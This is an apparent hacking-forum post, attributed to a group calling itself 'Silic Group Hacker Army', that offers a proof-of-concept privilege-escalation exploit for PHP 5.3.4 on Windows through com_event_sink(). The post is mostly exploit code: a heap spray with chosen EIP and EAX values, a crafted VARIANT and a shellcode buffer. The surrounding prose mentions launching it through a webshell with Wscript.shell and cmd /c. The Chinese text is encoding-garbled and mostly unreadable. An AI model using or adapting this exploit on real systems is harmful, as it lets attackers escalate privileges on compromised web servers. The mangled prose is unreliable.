admin 2012-11-9 21:08:13

PHP 5.3.4(WIN) COM_SINKȨ©

PHP°Ѿ5.4.xй½д5.2.x5.3.xĽ׶Ρ©php5.3.x汾

Է£cmd /c x:\php\php.exe x:\test.php

phpأȻʹphp.exephpɡWebshellʹphpexecȺִУʹWscript.shellcmd.exeȻ /c x:\php\php.exe x:\xxxx\test.php
ԵĽͼ





ɹô©Ĺ߽ϵͳȨ





©ԺϡһPoC룺

<?php
//PHP 5.3.4(Win) com_event_sink()ģȨ©
//$eip ="\x44\x43\x42\x41";
$eip= "\x4b\xe8\x57\x78";
$eax ="\x80\x01\x8d\x04";
$deodrant="";
$axespray = str_repeat($eip.$eax,0x80);
//048d0190
echo strlen($axespray);
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
echo "Silic Group Hacker Army - BlackBap.Org";
//19200 ==4B32 4b00
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
$terminate = "T";
$u[] =$deodrant;
$r[] =$deodrant.$terminate;
$a[] =$deodrant.$terminate;
$s[] =$deodrant.$terminate;
//$vVar = new VARIANT(0x048d0038+$offset);      ǿɿؿɸĵ
$vVar = new VARIANT(0x048d0000+180);
//(Shellcode)
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
$var2 = new VARIANT(0x41414242);
com_event_sink($vVar,$var2,$buffer);
?>
ҳ: [1]
鿴汾: PHP 5.3.4(WIN) COM_SINKȨ©